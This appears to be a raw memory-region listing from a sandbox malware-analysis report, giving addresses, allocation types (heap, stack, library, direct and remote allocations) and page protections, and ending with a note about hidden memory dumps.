trusted library allocation
page read and write
30BE000
stack
page read and write
23EF0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
21172000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
A8B9000
direct allocation
page execute and read and write
23200000
trusted library allocation
page read and write
C8A000
heap
page read and write
F00000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
21000000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
206F0000
direct allocation
page read and write
23EF0000
trusted library allocation
page read and write
A22000
trusted library allocation
page read and write
211C0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
2119F000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
400000
unkown
page readonly
212EA000
trusted library allocation
page read and write
2315A000
trusted library allocation
page read and write
2218D000
trusted library allocation
page read and write
9400000
direct allocation
page execute and read and write
23200000
trusted library allocation
page read and write
232C1000
heap
page read and write
20EA0000
direct allocation
page read and write
B2F000
stack
page read and write
23EEF000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
836000
heap
page read and write
231A0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
21008000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
4220000
remote allocation
page execute and read and write
236CD000
trusted library allocation
page read and write
231C0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
211A7000
trusted library allocation
page read and write
2BC0000
heap
page read and write
8710000
heap
page read and write
23EF0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
22361000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
21314000
trusted library allocation
page read and write
240A4000
trusted library allocation
page read and write
C48000
heap
page read and write
781000
unkown
page read and write
20FD0000
trusted library allocation
page read and write
BD0000
heap
page read and write
7890000
heap
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
7B60000
trusted library allocation
page read and write
4AD0000
trusted library section
page read and write
236D0000
trusted library allocation
page read and write
23EDE000
stack
page read and write
4B00000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
298F000
stack
page read and write
221EE000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
223F5000
trusted library allocation
page read and write
2314B000
trusted library allocation
page read and write
23D9E000
stack
page read and write
231B0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
92E000
stack
page read and write
210DC000
stack
page read and write
23EF0000
trusted library allocation
page read and write
3220000
heap
page read and write
23200000
trusted library allocation
page read and write
22101000
trusted library allocation
page read and write
2210B000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
830000
heap
page read and write
20E7F000
stack
page read and write
2131D000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
6101000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
812000
heap
page read and write
24060000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
50F0000
heap
page read and write
21534000
trusted library allocation
page read and write
AF0000
heap
page read and write
23EF0000
trusted library allocation
page read and write
23EE0000
trusted library allocation
page read and write
22459000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
794B000
heap
page read and write
22190000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
307E000
stack
page read and write
236D0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
4F8C000
stack
page read and write
23EF0000
trusted library allocation
page read and write
8700000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
2144F000
trusted library allocation
page read and write
78BF000
heap
page read and write
7BB0000
trusted library allocation
page read and write
7230000
direct allocation
page read and write
221BF000
trusted library allocation
page read and write
4B8E000
stack
page read and write
E90000
direct allocation
page read and write
22234000
trusted library allocation
page read and write
9410000
trusted library allocation
page execute and read and write
20E3E000
stack
page read and write
236D0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23210000
trusted library allocation
page read and write
236E0000
trusted library allocation
page execute and read and write
210F0000
heap
page read and write
7B10000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
22232000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
8BE0000
trusted library allocation
page execute and read and write
8D80000
heap
page read and write
222B6000
trusted library allocation
page read and write
89DA000
heap
page read and write
31E8000
heap
page read and write
23210000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
221DE000
trusted library allocation
page read and write
20D0F000
stack
page read and write
EC0000
trusted library allocation
page read and write
7E0000
trusted library allocation
page read and write
19A000
stack
page read and write
23EF0000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
7A8E000
stack
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20DAE000
stack
page read and write
236D0000
trusted library allocation
page read and write
231B0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
5A22000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
233C0000
trusted library allocation
page execute and read and write
23161000
trusted library allocation
page read and write
950000
heap
page read and write
EE0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23E5E000
stack
page read and write
236D0000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
40A000
unkown
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
8B26000
heap
page read and write
23200000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
C41000
heap
page read and write
23F10000
trusted library allocation
page read and write
222AB000
trusted library allocation
page read and write
A27000
trusted library allocation
page execute and read and write
23EF0000
trusted library allocation
page read and write
23190000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
231FD000
stack
page read and write
23210000
trusted library allocation
page read and write
23201000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
891E000
stack
page read and write
23EF0000
trusted library allocation
page read and write
31B8000
heap
page read and write
2134D000
trusted library allocation
page read and write
22394000
trusted library allocation
page read and write
236E0000
trusted library allocation
page read and write
2147D000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
231A0000
trusted library allocation
page read and write
222E4000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
22444000
trusted library allocation
page read and write
2341B000
heap
page read and write
CC4000
heap
page read and write
236D0000
trusted library allocation
page read and write
212BF000
trusted library allocation
page read and write
F20000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
20D6D000
stack
page read and write
EC0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
4B25000
trusted library allocation
page execute and read and write
842000
heap
page read and write
23200000
trusted library allocation
page read and write
5060000
heap
page execute and read and write
20F80000
heap
page read and write
797F000
heap
page read and write
23200000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
F20000
trusted library allocation
page read and write
EA0000
heap
page read and write
A30000
heap
page read and write
214AA000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
20EEA000
stack
page read and write
23F00000
trusted library allocation
page execute and read and write
8ABA000
heap
page read and write
215ED000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
89F0000
heap
page read and write
C8B000
heap
page read and write
23EF0000
trusted library allocation
page read and write
22460000
trusted library allocation
page read and write
7F4000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page execute and read and write
23200000
trusted library allocation
page read and write
212C4000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23F20000
trusted library allocation
page execute and read and write
7260000
direct allocation
page read and write
236D0000
trusted library allocation
page read and write
21176000
trusted library allocation
page read and write
2220E000
trusted library allocation
page read and write
C5C000
heap
page read and write
236C0000
trusted library allocation
page read and write
236D0000
trusted library allocation
page read and write
58A2000
trusted library allocation
page read and write
2314E000
trusted library allocation
page read and write
C8A000
heap
page read and write
22437000
trusted library allocation
page read and write
24060000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
221F0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
892B000
trusted library allocation
page read and write
72F5000
heap
page execute and read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
85D0000
trusted library allocation
page execute and read and write
22392000
trusted library allocation
page read and write
C48000
heap
page read and write
7ACE000
stack
page read and write
23EF0000
trusted library allocation
page read and write
F00000
trusted library allocation
page read and write
23F00000
trusted library allocation
page read and write
78DF000
heap
page read and write
22496000
trusted library allocation
page read and write
24030000
trusted library allocation
page read and write
77B000
unkown
page read and write
23EF0000
trusted library allocation
page read and write
322E000
heap
page read and write
232F9000
heap
page read and write
2224B000
trusted library allocation
page read and write
23166000
trusted library allocation
page read and write
7880000
heap
page read and write
23F00000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
AC0000
heap
page read and write
7BF0000
trusted library allocation
page read and write
223F3000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
221E4000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
324D000
heap
page read and write
EB0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
233E0000
trusted library allocation
page read and write
B6E000
stack
page read and write
22129000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
222F0000
trusted library allocation
page read and write
22308000
trusted library allocation
page read and write
7290000
direct allocation
page read and write
4AF0000
trusted library allocation
page read and write
23F20000
trusted library allocation
page read and write
8927000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
236C0000
trusted library allocation
page read and write
24080000
trusted library allocation
page read and write
23D5E000
stack
page read and write
23460000
heap
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
8A05000
heap
page read and write
23EF0000
trusted library allocation
page read and write
233F0000
heap
page execute and read and write
C48000
heap
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
31B0000
heap
page read and write
4BC0000
heap
page read and write
C90000
heap
page read and write
233E0000
trusted library allocation
page read and write
23200000
trusted library allocation
page read and write
23EF0000
trusted library allocation
page read and write
There are 977 hidden memdumps, click here to show them.